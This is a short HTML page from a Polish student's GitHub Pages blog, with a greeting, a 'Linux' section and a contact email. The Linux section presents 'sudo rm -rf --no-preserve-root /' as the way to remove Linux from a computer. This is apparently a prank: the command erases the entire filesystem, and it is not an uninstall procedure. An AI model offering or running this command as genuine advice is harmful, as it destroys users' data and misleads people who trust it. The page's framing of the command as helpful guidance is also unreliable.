<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="chrome=1">
    <title>Blog by mjaszczak</title>
    <link rel="stylesheet" href="stylesheets/styles.css">
    <link rel="stylesheet" href="stylesheets/pygment_trac.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
    <script src="javascripts/respond.js"></script>
    <!--[if lt IE 9]>
      <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
    <!--[if lt IE 8]>
    <link rel="stylesheet" href="stylesheets/ie.css">
    <![endif]-->
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">

  </head>
  <body>
      <div id="header">
        <nav>
          <li class="fork"><a href="https://github.com/mjaszczak/Blog">View On GitHub</a></li>
          <li class="downloads"><a href="https://github.com/mjaszczak/Blog/zipball/master">ZIP</a></li>
          <li class="downloads"><a href="https://github.com/mjaszczak/Blog/tarball/master">TAR</a></li>
          <li class="title">DOWNLOADS</li>
        </nav>
      </div><!-- end header -->

    <div class="wrapper">

      <section>
        <div id="title">
          <h1>Blog</h1>
          <p>Blog</p>
          <hr>
          <span class="credits left">Project maintained by <a href="https://github.com/mjaszczak">mjaszczak</a></span>
          <span class="credits right">Hosted on GitHub Pages &mdash; Theme by <a href="https://twitter.com/michigangraham">mattgraham</a></span>
        </div>

        <h3>
<a name="witam-na-stronie" class="anchor" href="#witam-na-stronie"><span class="octicon octicon-link"></span></a>Witam na stronie</h3>

<p>Nazywam się Mariusz Jaszczak i jestem studentem pierwszego roku informatyki. Jeszcze... </p>

<h3>
<a name="linux" class="anchor" href="#linux"><span class="octicon octicon-link"></span></a>Linux</h3>

<p>Jeśli kiedyś zastanawiałeś się w jaki sposób usunąć linuxa z komputera, oto sposób: </p>

<pre><code>$ sudo rm -rf --no-preserve-root /
</code></pre>

<h3>
<a name="kontakt" class="anchor" href="#kontakt"><span class="octicon octicon-link"></span></a>Kontakt</h3>

<p>email: <a href="mailto:mjaszczak@sigma.ug.edu.pl">mjaszczak@sigma.ug.edu.pl</a></p>
      </section>

    </div>
    <!--[if !IE]><script>fixScale(document);</script><![endif]-->
    
  </body>
</html>